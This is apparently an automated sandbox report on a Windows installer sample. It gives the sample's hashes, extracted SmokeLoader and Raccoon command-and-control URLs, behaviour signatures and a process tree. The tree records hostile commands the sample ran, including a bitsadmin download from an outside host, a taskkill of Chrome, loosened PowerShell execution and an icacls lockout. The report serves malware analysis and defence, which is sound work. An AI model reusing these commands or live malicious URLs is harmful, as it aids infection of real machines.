Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    192s
  • max time network
    205s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    25-04-2021 07:37

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes
  • url4cnc

    https://telete.in/baudemars

rc4.plain
rc4.plain

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 32 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:876
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:3876
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:296
      • C:\Users\Admin\AppData\Local\Temp\is-7Q53I.tmp\Install.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-7Q53I.tmp\Install.tmp" /SL5="$30158,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Users\Admin\AppData\Local\Temp\is-HTDE5.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-HTDE5.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:1112
          • C:\Program Files\DVD Maker\OYCXTJMYML\ultramediaburner.exe
            "C:\Program Files\DVD Maker\OYCXTJMYML\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:340
            • C:\Users\Admin\AppData\Local\Temp\is-69U4R.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-69U4R.tmp\ultramediaburner.tmp" /SL5="$6012C,281924,62464,C:\Program Files\DVD Maker\OYCXTJMYML\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:436
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:1720
          • C:\Users\Admin\AppData\Local\Temp\2e-48a57-118-a4ba0-4c61adbeb3f4e\Faemufakehae.exe
            "C:\Users\Admin\AppData\Local\Temp\2e-48a57-118-a4ba0-4c61adbeb3f4e\Faemufakehae.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1596
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1592
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1592 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1984
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1592 CREDAT:340994 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:3772
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3772 -s 1408
                  7⤵
                  • Program crash
                  • Suspicious behavior: GetForegroundWindowSpam
                  PID:6112
          • C:\Users\Admin\AppData\Local\Temp\b9-81732-a5e-cd988-4a273aa3a8bb6\Timifinugy.exe
            "C:\Users\Admin\AppData\Local\Temp\b9-81732-a5e-cd988-4a273aa3a8bb6\Timifinugy.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:432
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qgw0a2cw.2cz\instEU.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5496
              • C:\Users\Admin\AppData\Local\Temp\qgw0a2cw.2cz\instEU.exe
                C:\Users\Admin\AppData\Local\Temp\qgw0a2cw.2cz\instEU.exe
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:5632
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0z1yuokt.fzf\google-game.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3604
              • C:\Users\Admin\AppData\Local\Temp\0z1yuokt.fzf\google-game.exe
                C:\Users\Admin\AppData\Local\Temp\0z1yuokt.fzf\google-game.exe
                6⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3668
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  7⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3752
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bpzjl2zq.h3j\md1_1eaf.exe & exit
              5⤵
                PID:1520
                • C:\Users\Admin\AppData\Local\Temp\bpzjl2zq.h3j\md1_1eaf.exe
                  C:\Users\Admin\AppData\Local\Temp\bpzjl2zq.h3j\md1_1eaf.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:5200
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miqv0zfm.htq\askinstall39.exe & exit
                5⤵
                  PID:3292
                  • C:\Users\Admin\AppData\Local\Temp\miqv0zfm.htq\askinstall39.exe
                    C:\Users\Admin\AppData\Local\Temp\miqv0zfm.htq\askinstall39.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3332
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /c taskkill /f /im chrome.exe
                      7⤵
                        PID:5344
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im chrome.exe
                          8⤵
                          • Kills process with taskkill
                          PID:5080
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wxoprbt.nna\inst.exe & exit
                    5⤵
                      PID:4664
                      • C:\Users\Admin\AppData\Local\Temp\1wxoprbt.nna\inst.exe
                        C:\Users\Admin\AppData\Local\Temp\1wxoprbt.nna\inst.exe
                        6⤵
                        • Executes dropped EXE
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:4796
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x4isza0j.fnl\SunLabsPlayer.exe /S & exit
                      5⤵
                        PID:3132
                        • C:\Users\Admin\AppData\Local\Temp\x4isza0j.fnl\SunLabsPlayer.exe
                          C:\Users\Admin\AppData\Local\Temp\x4isza0j.fnl\SunLabsPlayer.exe /S
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:3372
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                            7⤵
                              PID:4060
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                              7⤵
                                PID:2436
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                                7⤵
                                  PID:5956
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                                  7⤵
                                    PID:4560
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                                    7⤵
                                      PID:4832
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                                      7⤵
                                        PID:5308
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nssE84E.tmp\tempfile.ps1"
                                        7⤵
                                        • Checks for any installed AV software in registry
                                        PID:2424
                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                        7⤵
                                        • Download via BitsAdmin
                                        PID:2776
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ecbpv4c.edu\GcleanerWW.exe /mixone & exit
                                    5⤵
                                      PID:3488
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k5arnkqx.zph\toolspab1.exe & exit
                                      5⤵
                                        PID:3576
                                        • C:\Users\Admin\AppData\Local\Temp\k5arnkqx.zph\toolspab1.exe
                                          C:\Users\Admin\AppData\Local\Temp\k5arnkqx.zph\toolspab1.exe
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:3640
                                          • C:\Users\Admin\AppData\Local\Temp\k5arnkqx.zph\toolspab1.exe
                                            C:\Users\Admin\AppData\Local\Temp\k5arnkqx.zph\toolspab1.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:4092
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrxuv4j2.b35\c7ae36fa.exe & exit
                                        5⤵
                                          PID:3712
                                          • C:\Users\Admin\AppData\Local\Temp\lrxuv4j2.b35\c7ae36fa.exe
                                            C:\Users\Admin\AppData\Local\Temp\lrxuv4j2.b35\c7ae36fa.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            • Suspicious behavior: MapViewOfSection
                                            PID:3808
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kzq2tuxz.ato\app.exe /8-2222 & exit
                                          5⤵
                                            PID:4204
                                            • C:\Users\Admin\AppData\Local\Temp\kzq2tuxz.ato\app.exe
                                              C:\Users\Admin\AppData\Local\Temp\kzq2tuxz.ato\app.exe /8-2222
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:3952
                                              • C:\Users\Admin\AppData\Local\Temp\kzq2tuxz.ato\app.exe
                                                "C:\Users\Admin\AppData\Local\Temp\kzq2tuxz.ato\app.exe" /8-2222
                                                7⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                PID:5420
                                  • C:\Users\Admin\AppData\Local\Temp\CE37.exe
                                    C:\Users\Admin\AppData\Local\Temp\CE37.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:3044
                                  • C:\Users\Admin\AppData\Local\Temp\D02C.exe
                                    C:\Users\Admin\AppData\Local\Temp\D02C.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2000
                                  • C:\Users\Admin\AppData\Local\Temp\DEBD.exe
                                    C:\Users\Admin\AppData\Local\Temp\DEBD.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Adds Run key to start application
                                    PID:2980
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Users\Admin\AppData\Local\c271d844-3af5-4aae-9088-9af7640e6519" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                      2⤵
                                      • Modifies file permissions
                                      PID:3128
                                    • C:\Users\Admin\AppData\Local\Temp\DEBD.exe
                                      "C:\Users\Admin\AppData\Local\Temp\DEBD.exe" --Admin IsNotAutoStart IsNotTask
                                      2⤵
                                      • Executes dropped EXE
                                      PID:3256
                                  • C:\Users\Admin\AppData\Local\Temp\DEDD.exe
                                    C:\Users\Admin\AppData\Local\Temp\DEDD.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:2068
                                  • C:\Users\Admin\AppData\Local\Temp\ED40.exe
                                    C:\Users\Admin\AppData\Local\Temp\ED40.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:2060
                                  • C:\Users\Admin\AppData\Local\Temp\F01E.exe
                                    C:\Users\Admin\AppData\Local\Temp\F01E.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:3192
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F01E.exe"
                                      2⤵
                                        PID:3816
                                    • C:\Users\Admin\AppData\Local\Temp\3FD.exe
                                      C:\Users\Admin\AppData\Local\Temp\3FD.exe
                                      1⤵
                                        PID:3464
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\utngfzvm\
                                          2⤵
                                            PID:812
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ruaujufl.exe" C:\Windows\SysWOW64\utngfzvm\
                                            2⤵
                                              PID:3252
                                            • C:\Users\Admin\rielcbfj.exe
                                              "C:\Users\Admin\rielcbfj.exe" /d"C:\Users\Admin\AppData\Local\Temp\3FD.exe" /e5503011200000005
                                              2⤵
                                                PID:4104
                                            • C:\Users\Admin\AppData\Local\Temp\22F3.exe
                                              C:\Users\Admin\AppData\Local\Temp\22F3.exe
                                              1⤵
                                                PID:3940
                                              • C:\Windows\SysWOW64\explorer.exe
                                                C:\Windows\SysWOW64\explorer.exe
                                                1⤵
                                                  PID:4216
                                                • C:\Windows\explorer.exe
                                                  C:\Windows\explorer.exe
                                                  1⤵
                                                    PID:4380
                                                  • C:\Windows\SysWOW64\explorer.exe
                                                    C:\Windows\SysWOW64\explorer.exe
                                                    1⤵
                                                      PID:4416

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • memory/296-61-0x0000000000400000-0x000000000042B000-memory.dmp

                                                      Filesize

                                                      172KB

                                                    • memory/296-60-0x00000000757E1000-0x00000000757E3000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/340-79-0x0000000000400000-0x0000000000416000-memory.dmp

                                                      Filesize

                                                      88KB

                                                    • memory/432-111-0x0000000000240000-0x0000000000242000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/432-109-0x000007FEF1990000-0x000007FEF2A26000-memory.dmp

                                                      Filesize

                                                      16.6MB

                                                    • memory/432-116-0x0000000000246000-0x0000000000265000-memory.dmp

                                                      Filesize

                                                      124KB

                                                    • memory/436-88-0x00000000001D0000-0x00000000001D1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/436-89-0x0000000073FA1000-0x0000000073FA3000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/876-146-0x00000000008D0000-0x000000000091B000-memory.dmp

                                                      Filesize

                                                      300KB

                                                    • memory/876-147-0x00000000010B0000-0x0000000001120000-memory.dmp

                                                      Filesize

                                                      448KB

                                                    • memory/1112-75-0x0000000000C30000-0x0000000000C32000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/1196-217-0x0000000004250000-0x0000000004267000-memory.dmp

                                                      Filesize

                                                      92KB

                                                    • memory/1196-218-0x00000000047C0000-0x00000000047D5000-memory.dmp

                                                      Filesize

                                                      84KB

                                                    • memory/1596-105-0x0000000000A60000-0x0000000000A62000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/1720-121-0x00000000003B5000-0x00000000003B6000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/1720-118-0x0000000001200000-0x0000000001219000-memory.dmp

                                                      Filesize

                                                      100KB

                                                    • memory/1720-120-0x0000000000396000-0x00000000003B5000-memory.dmp

                                                      Filesize

                                                      124KB

                                                    • memory/1720-104-0x0000000000390000-0x0000000000392000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/1720-101-0x000007FEF1990000-0x000007FEF2A26000-memory.dmp

                                                      Filesize

                                                      16.6MB

                                                    • memory/1828-70-0x0000000000240000-0x0000000000241000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2060-296-0x0000000000400000-0x0000000002C01000-memory.dmp

                                                      Filesize

                                                      40.0MB

                                                    • memory/2060-295-0x0000000000300000-0x000000000036B000-memory.dmp

                                                      Filesize

                                                      428KB

                                                    • memory/2068-286-0x00000000002F0000-0x00000000002F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2068-285-0x0000000005020000-0x0000000005021000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2424-279-0x0000000004842000-0x0000000004843000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2424-278-0x0000000004840000-0x0000000004841000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-242-0x00000000024B0000-0x00000000024B1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-244-0x0000000004800000-0x0000000004801000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-248-0x0000000006100000-0x0000000006101000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-247-0x00000000053A0000-0x00000000053A1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-246-0x00000000026E0000-0x00000000026E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-245-0x0000000004802000-0x0000000004803000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2436-243-0x0000000004840000-0x0000000004841000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/2980-289-0x00000000044A0000-0x00000000045BA000-memory.dmp

                                                      Filesize

                                                      1.1MB

                                                    • memory/2980-290-0x0000000000400000-0x0000000002C30000-memory.dmp

                                                      Filesize

                                                      40.2MB

                                                    • memory/3192-293-0x0000000000220000-0x00000000002B1000-memory.dmp

                                                      Filesize

                                                      580KB

                                                    • memory/3192-294-0x0000000000400000-0x0000000003DF0000-memory.dmp

                                                      Filesize

                                                      57.9MB

                                                    • memory/3256-299-0x0000000000400000-0x0000000002C30000-memory.dmp

                                                      Filesize

                                                      40.2MB

                                                    • memory/3464-300-0x0000000000220000-0x0000000000233000-memory.dmp

                                                      Filesize

                                                      76KB

                                                    • memory/3464-302-0x0000000000400000-0x0000000002BAE000-memory.dmp

                                                      Filesize

                                                      39.7MB

                                                    • memory/3640-203-0x0000000000220000-0x000000000022C000-memory.dmp

                                                      Filesize

                                                      48KB

                                                    • memory/3752-145-0x0000000000220000-0x000000000027C000-memory.dmp

                                                      Filesize

                                                      368KB

                                                    • memory/3752-143-0x0000000010000000-0x0000000010002000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/3752-144-0x0000000000950000-0x0000000000A51000-memory.dmp

                                                      Filesize

                                                      1.0MB

                                                    • memory/3772-188-0x0000000000D00000-0x0000000000D02000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/3808-208-0x0000000000400000-0x0000000002BA9000-memory.dmp

                                                      Filesize

                                                      39.7MB

                                                    • memory/3808-207-0x0000000000220000-0x0000000000229000-memory.dmp

                                                      Filesize

                                                      36KB

                                                    • memory/3876-149-0x0000000000470000-0x00000000004E0000-memory.dmp

                                                      Filesize

                                                      448KB

                                                    • memory/3876-192-0x00000000029F0000-0x0000000002AEF000-memory.dmp

                                                      Filesize

                                                      1020KB

                                                    • memory/3952-214-0x0000000000400000-0x0000000000D25000-memory.dmp

                                                      Filesize

                                                      9.1MB

                                                    • memory/3952-213-0x0000000002AD0000-0x00000000033DB000-memory.dmp

                                                      Filesize

                                                      9.0MB

                                                    • memory/4060-211-0x0000000004A30000-0x0000000004A31000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-222-0x00000000057E0000-0x00000000057E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-236-0x0000000006340000-0x0000000006341000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-229-0x00000000063C0000-0x00000000063C1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-209-0x0000000002430000-0x0000000002431000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-210-0x0000000004A70000-0x0000000004A71000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-212-0x0000000004A32000-0x0000000004A33000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-215-0x0000000002510000-0x0000000002511000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-216-0x0000000004970000-0x0000000004971000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-239-0x0000000006600000-0x0000000006601000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-223-0x000000007EF30000-0x000000007EF31000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4060-228-0x0000000005860000-0x0000000005861000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4092-197-0x0000000000400000-0x000000000040C000-memory.dmp

                                                      Filesize

                                                      48KB

                                                    • memory/4560-265-0x0000000001EC0000-0x0000000002B0A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                    • memory/4560-268-0x0000000005830000-0x0000000005831000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4560-262-0x0000000002220000-0x0000000002221000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4560-264-0x00000000050B0000-0x00000000050B1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4560-267-0x0000000005320000-0x0000000005321000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4560-266-0x0000000001EC0000-0x0000000002B0A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                    • memory/4796-166-0x0000000000240000-0x0000000000250000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4796-168-0x0000000000300000-0x0000000000312000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/4832-273-0x0000000002040000-0x0000000002C8A000-memory.dmp

                                                      Filesize

                                                      12.3MB

                                                    • memory/5308-276-0x0000000004712000-0x0000000004713000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/5308-275-0x0000000004710000-0x0000000004711000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/5632-127-0x0000000000240000-0x0000000000250000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/5632-128-0x0000000000270000-0x0000000000282000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/5956-251-0x00000000021B0000-0x00000000021B1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/5956-253-0x0000000002680000-0x0000000002681000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/5956-254-0x0000000001EE0000-0x0000000002B2A000-memory.dmp

                                                      Filesize

                                                      12.3MB

